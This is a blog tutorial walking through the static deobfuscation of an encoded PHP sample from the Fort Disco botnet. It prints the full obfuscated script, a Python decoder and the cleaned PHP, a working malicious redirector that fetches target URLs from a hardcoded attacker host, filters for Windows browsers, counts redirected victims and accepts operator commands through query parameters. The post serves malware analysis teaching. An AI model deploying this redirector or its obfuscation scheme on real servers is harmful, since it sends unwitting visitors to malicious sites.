10 August 2013

How To: Static analysis of encoded PHP scripts

This week, Steve Ragan of CSO Online posted an article on a PHP-based botnet named by Arbor Networks as Fort Disco. As part of his analysis, Ragan posted an oddly obfuscated PHP script for others to tinker with, shown below:

<? $GLOBALS['_584730172_']=Array(base64_decode('ZXJy' .'b' .'3JfcmVw' .'b' .'3J0aW5n'),base64_decode('c' .'2V0X3RpbWV' .'fbGl' .'taXQ' .'='),base64_decode('' .'ZG' .'Vma' .'W' .'5l'),base64_decode('' .'ZGlyb' .'mFtZQ=='),base64_decode('ZGVm' .'aW5l'),base64_decode('' .'d' .'W5saW5r'),base64_decode('Zml' .'sZ' .'V9le' .'G' .'lzdHM='),base64_decode('dG91Y2' .'g='),base64_decode('aXNfd3J' .'p' .'dGFibGU='),base64_decode('dHJ' .'p' .'bQ=='),base64_decode('ZmlsZ' .'V9nZXRf' .'Y29udGVud' .'HM='),base64_decode('dW5s' .'aW5r'),base64_decode('Zm' .'lsZ' .'V9nZXRf' .'Y2' .'9u' .'dGVudHM='),base64_decode('d' .'W5' .'saW5r'),base64_decode('cH' .'JlZ19' .'tYX' .'Rj' .'aA=='),base64_decode('aW1wb' .'G9kZ' .'Q=='),base64_decode('cHJlZ19t' .'YXRja' .'A=='),base64_decode('a' .'W1w' .'bG9k' .'Z' .'Q=='),base64_decode('Zml' .'s' .'ZV' .'9nZXRfY' .'29' .'udGV' .'udH' .'M='),base64_decode('Z' .'m9w' .'ZW4='),base64_decode('' .'ZmxvY' .'2' .'s' .'='),base64_decode('ZnB1' .'dH' .'M='),base64_decode('Zmx' .'vY' .'2s' .'='),base64_decode('Zm' .'Nsb3' .'Nl'),base64_decode('Z' .'mlsZV9leG' .'lzdH' .'M='),base64_decode('dW5zZX' .'JpYWx' .'pemU='),base64_decode('Z' .'mlsZV9nZXRfY29udGVu' .'dHM='),base64_decode('dGlt' .'ZQ' .'=' .'='),base64_decode('Zm' .'ls' .'Z' .'V9n' .'ZX' .'RfY29' .'ud' .'GVu' .'dHM='),base64_decode('d' .'GltZ' .'Q=='),base64_decode('Zm9w' .'ZW4='),base64_decode('Zmx' .'vY2s='),base64_decode('' .'ZnB1dHM='),base64_decode('c2VyaWFsaX' .'pl'),base64_decode('Zm' .'xvY2s='),base64_decode('ZmNsb' .'3N' .'l'),base64_decode('c' .'3Vic3Ry'),base64_decode('' .'a' .'GVhZGVy'),base64_decode('aGVhZGV' .'y')); ?><? function _1348942592($i){$a=Array('aHR0cDovL2dheWxlZWNoZXIuY29tOjgx','cXdlMTIz','cXdlMTIz','MTIzcXdl','Uk9PVA==','Lw==','TE9H','b2xvbG8udHh0','L2lmcmFtZS50eHQ=','dGVzdA==','d29yaw==','Tk8gV09SSywgTk9UIEdFVCBVUkw=','Tk8gV09SSywgTk9UIFdSSVRJQkxF','YWFh','YWFh','YWFh','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','YmJi','YmJi','Y2Nj','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','TnVsbCBjb3VudCBvaw==','RVJST1IgbnVsbCBjb3VudCgo','SFRUUF9VU0VSX0FHRU5U','TVNJRQ==','RmlyZWZveA==','T3BlcmE=','V2luZG93cw==','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','dw==','L2lmcmFtZTIudHh0','aHR0cDovL3lhLnJ1Lw==','c2V0dGluZ3MuanNvbg==','c2V0dGluZ3MuanNvbg==','bGFzdA==','dXJs','bGFzdA==','dXJs','bGFzdA==','c2V0dGluZ3MuanNvbg==','dw==','dXJs','dXJs','aHR0cA==','aHR0cDovLw==','Lw==','SFRUUC8xLjEgNDA0IE5vdCBGb3VuZA==');return base64_decode($a[$i]);} ?><?php $GLOBALS['_584730172_'][0](round(0));$GLOBALS['_584730172_'][1](round(0));$_0=_1348942592(0);if(isset($_GET[_1348942592(1)])AND $_GET[_1348942592(2)]==_1348942592(3)){$GLOBALS['_584730172_'][2](_1348942592(4),$GLOBALS['_584730172_'][3](__FILE__) ._1348942592(5));$GLOBALS['_584730172_'][4](_1348942592(6),ROOT ._1348942592(7));@$GLOBALS['_584730172_'][5](LOG);if(!$GLOBALS['_584730172_'][6](LOG)){@$GLOBALS['_584730172_'][7](LOG);if($GLOBALS['_584730172_'][8](LOG)AND $GLOBALS['_584730172_'][9]($GLOBALS['_584730172_'][10]($_0 ._1348942592(8)))==_1348942592(9)){@$GLOBALS['_584730172_'][11](LOG);echo _1348942592(10);}else{echo _1348942592(11);}}else{echo _1348942592(12);}exit;}if(isset($_GET[_1348942592(13)])AND $_GET[_1348942592(14)]== _1348942592(15)){$_1=$GLOBALS['_584730172_'][12]($_SERVER[_1348942592(16)] ._1348942592(17));echo $_1;exit;}if(isset($_GET[_1348942592(18)])AND $_GET[_1348942592(19)]== _1348942592(20)){if($GLOBALS['_584730172_'][13]($_SERVER[_1348942592(21)] ._1348942592(22))){echo _1348942592(23);}else{echo _1348942592(24);}exit;}if(!empty($_SERVER[_1348942592(25)])){$_2=array(_1348942592(26),_1348942592(27),_1348942592(28));$_3=array(_1348942592(29));if($GLOBALS['_584730172_'][14](_1348942592(30) .$GLOBALS['_584730172_'][15](_1348942592(31),$_2) ._1348942592(32),$_SERVER[_1348942592(33)])){if($GLOBALS['_584730172_'][16](_1348942592(34) .$GLOBALS['_584730172_'][17](_1348942592(35),$_3) ._1348942592(36),$_SERVER[_1348942592(37)])){$_4=@$GLOBALS['_584730172_'][18]($_SERVER[_1348942592(38)] ._1348942592(39));if($_4 == _1348942592(40)or $_4 == false)$_4=round(0);$_5=@$GLOBALS['_584730172_'][19]($_SERVER[_1348942592(41)] ._1348942592(42),_1348942592(43));@$GLOBALS['_584730172_'][20]($_5,LOCK_EX);@$GLOBALS['_584730172_'][21]($_5,$_4+round(0+1));@$GLOBALS['_584730172_'][22]($_5,LOCK_UN);@$GLOBALS['_584730172_'][23]($_5);$_6=$_0 ._1348942592(44);$_7=round(0+300);$_8=_1348942592(45);if(!$_6)exit();$_9=$GLOBALS['_584730172_'][24](_1348942592(46))?$GLOBALS['_584730172_'][25]($GLOBALS['_584730172_'][26](_1348942592(47))):array(_1348942592(48)=>round(0),_1348942592(49)=>$_8);if($_9[_1348942592(50)]<$GLOBALS['_584730172_'][27]()-$_7){if($_9[_1348942592(51)]=$GLOBALS['_584730172_'][28]($_6)){$_9[_1348942592(52)]=$GLOBALS['_584730172_'][29]();$_10=$GLOBALS['_584730172_'][30](_1348942592(53),_1348942592(54));$GLOBALS['_584730172_'][31]($_10,LOCK_EX);$GLOBALS['_584730172_'][32]($_10,$GLOBALS['_584730172_'][33]($_9));$GLOBALS['_584730172_'][34]($_10,LOCK_UN);$GLOBALS['_584730172_'][35]($_10);}}$_11=$_9[_1348942592(55)]?$_9[_1348942592(56)]:$_8;if($GLOBALS['_584730172_'][36]($_11,round(0),round(0+1+1+1+1))!= _1348942592(57))$_11=_1348942592(58) .$_11 ._1348942592(59);$GLOBALS['_584730172_'][37]("Location: $_11");exit;}}}$GLOBALS['_584730172_'][38](_1348942592(60)); ?>

As a fan of obfuscation, this clearly piqued my interest. The initial question was what was contained within all of the Base64 sections, but let's examine this holistically.  At a high level view, there are three distinct sections to this code block, with the beginning of each underlined in the code above. Each can also be identified as beginning with "<?".




The "<? $GLOBALS['_584730172_']" section creates an array of multiple Base64-encoded function values. As each item is called by the code, base64_decode will run on its value and return actual text. By hand picking a few of these to test, they all return known PHP function names:
base64_decode('ZXJy' .'b' .'3JfcmVw' .'b' .'3J0aW5n') resolves to "error_reporting"
base64_decode('c' .'2V0X3RpbWV' .'fbGl' .'taXQ' .'=') resolves to "set_time_limit"

The actual Base64 encoded values are further obfuscated by breaking up the string into multiple segments and rejoining them with the PHP ".". As many stateful inspection devices may block PHP that contains a call of "preg_match", bad guys will normally Base64 encode it. But, devices can also search for the Base64 values of bad calls. So, to avoid this, the obfuscator code (not seen here) will randomly break up the text into chunks that are difficult for an automated device to piece back together.

Knowing that the "$GLOBALS['_584730172_']" resolves function names, we can analyze it in code with context. "$GLOBALS['_584730172_'][0]" will extract the first function name from the array ("error_reporting") and execute it in-place. We know that we need to just replace these calls with their actual Base64 decoded values. This can be done manually, but we'll do it automatically later.

The second section of the code is a function:
<? function _1348942592($i){

This function is doing the same thing as the "$GLOBALS['_584730172_']", but in a different manner. When passed a number, the function finds its corresponding value in an array and Base64 decodes it. When looking through these we see that they're the string values associataed with the code:
'aHR0cDovL2dheWxlZWNoZXIuY29tOjgx' resolves to "http://gayleecher.com:81"
'cXdlMTIz' resolves to "qwe123"

We see these strings substituted within the code as function calls like:
$_0=_1348942592(0);

Just as with the function names, we'll want to replace these calls with their respective strings in the code. 

And, finally, that leaves us with the actual code itself. By itself, it's not possible to analyze this without the function names and strings. You could manually replace the calls with the appropriate values, but it could also be done automatically. While in a hotel for an incident response, and waiting for my colleagues to prepare for dinner, I whipped up a very ugly decoder in Python. I've taken the time to clean it up a bit, shown below:

import base64
script = """
<<script>>
"""

functions = []
strings = []

# Split the script into its three segments (functions, strings, code).
sections = script.split("<?")
function_section = sections[1]
string_section = sections[2]
code = "<?" + sections[3]

# Parse through each value, separated by base64_decode call.
for entry in function_section.split("base64_decode"):
    # Skip the initial entry as it contains no value.
    if "GLOBALS" in entry:
        continue
    # Remove the string concatenations
    entry = entry.replace("' .'", "")
    # Split on single quote to get the Base64 value contained within the quotes.
    function = entry.split("'")[1]
    # Append new function mame into array
    functions.append(base64.b64decode(function))

for entry in string_section.split(","):
    entry = entry.split("'")[1]
    strings.append(base64.b64decode(entry))

# Now start replacing function calls with true values. We split on the call to
# acquire each index number, then replace.
code_lines = code.split("$GLOBALS['_584730172_']")
for line_num in range(1, len(code_lines)):
    line = code_lines[line_num]
    # Ensure the index call, [x], is in the string before going on.
    if not "[" in line:
        continue
    # Extract the index number, pull the function from the array.
    codenum = line.split("[")[1].split("]")[0]
    func = functions[int(codenum)]
    # Recreate the array string and replace it in the code.
    s = "$GLOBALS['_584730172_'][%s]" % codenum
    code = code.replace(s, func)

# Now start replacing strings with true values.
code_lines = code.split("_1348942592")
for line_num in range(1, len(code_lines)):
    line = code_lines[line_num]
    if not "(" in line:
        continue
    codenum = line.split("(")[1].split(")")[0]
    string = strings[int(codenum)]
    s = "_1348942592(%s)" % codenum
    code = code.replace(s, "'" + string + "'")

# Print the final code.
print code


The resulting code has another slight level of obfuscation: no carriage returns or spacing. This is easily resolved by submitting the code to an online code cleaner, such as PHP Code Cleaner. This results in the original code which is much easier to analyze:


<?php 
    error_reporting(round(0));
    set_time_limit(round(0));
    $_0='http://gayleecher.com:81';

    if(isset($_GET['qwe123'])AND $_GET['qwe123']=='123qwe'){
        define('ROOT',dirname(__FILE__) .'/');
        define('LOG',ROOT .'ololo.txt');
        @unlink(LOG);

        if(!file_exists(LOG)){
            @touch(LOG);

            if(is_writable(LOG)AND trim(file_get_contents($_0 .'/iframe.txt'))=='test'){
                @unlink(LOG);
                echo 'work';
            } else {
                echo 'NO WORK, NOT GET URL';
            }
        }
        else{
            echo 'NO WORK, NOT WRITIBLE';
        }
        exit;
    }
    
    if(isset($_GET['aaa'])AND $_GET['aaa']=='aaa'){
        $_1=file_get_contents($_SERVER['SCRIPT_FILENAME'] .'.count');
        echo $_1;
        exit;
    }

    if(isset($_GET['bbb'])AND $_GET['bbb']== 'ccc'){
        if(unlink($_SERVER['SCRIPT_FILENAME'] .'.count')){
            echo 'Null count ok';
        } else {
            echo 'ERROR null count((';
        }
        exit;
    }

    
    if(!empty($_SERVER['HTTP_USER_AGENT'])){
        $_2=array('MSIE','Firefox','Opera');
        $_3=array('Windows');
        
        if(preg_match('/' .implode('|',$_2) .'/i',$_SERVER['HTTP_USER_AGENT'])){
            if(preg_match('/' .implode('|',$_3) .'/i',$_SERVER['HTTP_USER_AGENT'])){
                $_4=@file_get_contents($_SERVER['SCRIPT_FILENAME'] .'.count');
                if($_4 == ''or $_4 == false)$_4=round(0);
                $_5=@fopen($_SERVER['SCRIPT_FILENAME'] .'.count','w');
                @flock($_5,LOCK_EX);
                @fputs($_5,$_4+round(0+1));
                @flock($_5,LOCK_UN);
                @fclose($_5);
                $_6=$_0 .'/iframe2.txt';
                $_7=round(0+300);
                $_8='http://ya.ru/';
                
                if (!$_6) exit();
                $_9 = file_exists('settings.json') ? unserialize(file_get_contents('settings.json')) : array('last'=>round(0),'url'=>$_8);
                
                if($_9['last']<time()-$_7){
                    if($_9['url']=file_get_contents($_6)){
                        $_9['last']=time();
                        $_10=fopen('settings.json','w');
                        flock($_10,LOCK_EX);
                        fputs($_10,serialize($_9));
                        flock($_10,LOCK_UN);
                        fclose($_10);
                    }
                }
                $_11 = $_9['url'] ? $_9['url'] : $_8;
                if(substr($_11,round(0),round(0+1+1+1+1))!= 'http')$_11='http://' .$_11 .'/';
                header("Location: $_11");
                exit;
            }
        }
    }
    header('HTTP/1.1 404 Not Found');
    ?>

Let's walk through this a bit. The code has multiple paths, depending on various inputs. These inputs are passed along as URI values

    if(isset($_GET['qwe123'])AND $_GET['qwe123']=='123qwe'){

This line is responsible for checking for a URI field named "qwe123", such as:

http://www.website.com/a.php?qwe123=123qwe

If that field contains the value "123qwe", then this section of code is executed. This section looks for a file named "ololo.txt" in the same directory as the malicious code and, if found, deletes it (unlink()). If this doesn't work, it displays "NO WORK, NOT WRITABLE" in the web session. This file exists solely for the code to determine if it has write permissions to the folder via the web. It also ensures that it can browse to the malicious domain by retrieving hxxp://gayleecher.com:81/iframe.txt and ensuring that this file contains the text "test".

    if(isset($_GET['aaa'])AND $_GET['aaa']=='aaa'){

This line checks for a URI field named "aaa" and ensures it contains the value of "aaa". If so, it will retrieve the code's current file name, append ".count" to the end of the name, and determine if that file exists in the current web folder. For example, a.php would look for a.php.count. If it exists, the contents will be displayed in the web session.

    if(isset($_GET['bbb'])AND $_GET['bbb']== 'ccc'){

This line checks for a URI field named "bbb" and ensures it contains the value of "ccc". If so, it will locate the aforementioned .count file and delete it.

Lacking any submitted values, the code performs its default routine. This begins by using ensuring that the visitor is using a Windows-based machine running Internet Explorer, Firefox, or Opera based upon the browser's user-agent. The code then updates its ".count" file to increment the counter by one. A request is then made to retrieve the contents of hxxp://gayleecher.com:81/iframe2.txt. This file currently contains:

http://s2s2s2.in/?id=123

Afterward is a line that would confuse many not familiar with ternary logic commands:

$_9 = file_exists('settings.json') ? unserialize(file_get_contents('settings.json')) : array('last'=>round(0),'url'=>$_8);

A ternary operation checks a logical condition to see if it is true or false. If true, it returns one set data; if false, another.

result = condition ? result_true : result_false

In this case, does the file "settings.json" exist? If so, then read the contents through unserialize() (which takes raw data and forms it into logical arrays) and place the resulting arrays into $_9. If "settings.json" does not exist, then create a new array with a "url" field that contains $_8 ("http://ya.ru").

The "url" field in this array is then set to the contents of the iframe2.txt file above, and the "last" field set to the current date and time as an epoch value. The values are then written to "settings.json".

Another aspect of this is the time frequency of connections. This can be determined by examining the following lines:
                $_7=round(0+300);
                if($_9['last']<time()-$_7){

This code sets $_7 to "300", with the "round(0" as cruft code that can be ignored. The same then checks to see if the "last" visit time is less than the current time (as an epoch) minus 300 seconds, or 5 minutes. In essence, if it's been longer than 5 minutes since checking in with iframe2.txt, the sample will check in to acquire the latest URL to connect to.

Later logic ensures that there is a URL set. If not, it will default to the hardcoded address of "http://ya.ru". For additional checking, the sample then ensures that the sample begins with the text "http". If not, it prepends it to create a valid URL:

if(substr($_11,round(0),round(0+1+1+1+1))!= 'http')$_11='http://' .$_11 .'/';

The point to this entire script comes at the very end:

                header("Location: $_11");

This is a slightly obscure PHP call that appends a raw HTTP header field to the outgoing response. In this case, it adds a "Location: " field used to redirect the client to a new web site.

So let's sit back and take in what we know.

This is an obfuscated PHP code that sits on a web server. When visited by a home user, the code will query gayleecher.com to retrieve a redirect URL. It saves this to a local file named "settings.json" and then redirects the home user to the same URL. All the while, a counter is being saved in the background that logs how many total home users are redirected. The actor can query this information by passing certain arguments to see how many total users were redirected.

At this time, all users are redirected to:

http://s2s2s2.in/?id=123

I hope this was insightful to anyone learning web attack analysis. I am a big fan of obfuscation, encoding, and encryption and love to tear apart such samples. As I've joked about, this is like Sudoku as a relaxing yet challenging exercise that more people should learn :)

6 comments:

  1. Hi,
    any chance to see here the obfuscator name or source code?
    Thank you very much!

    ReplyDelete
    Replies
    1. Unfortunately, the actual obfuscator isn't known for this. Or, at least, not known to me. All I have to work from is it's final result.

      Delete
    2. Thank you very much Brian.
      I encountered a Web bot obfuscated in that way and I coded a simple deobfuscator to recover more or less the source code.
      I would like to see the obfuscator source code to refine the deobfuscator.
      Thanks anyway.

      Delete
    3. Hi Brian,
      probably you don't need this information, but I found the obfuscator used here: it's called PHP Obfuscator by DX.
      Have a nice day

      Delete
    4. Awesome! Yes, thank you, I was very curious where it originated.

      Delete
  2. Distinguishing proof: This part is essential since it shows the content title, creator, classification, sub-kind, sort of material, and region coverage script

    ReplyDelete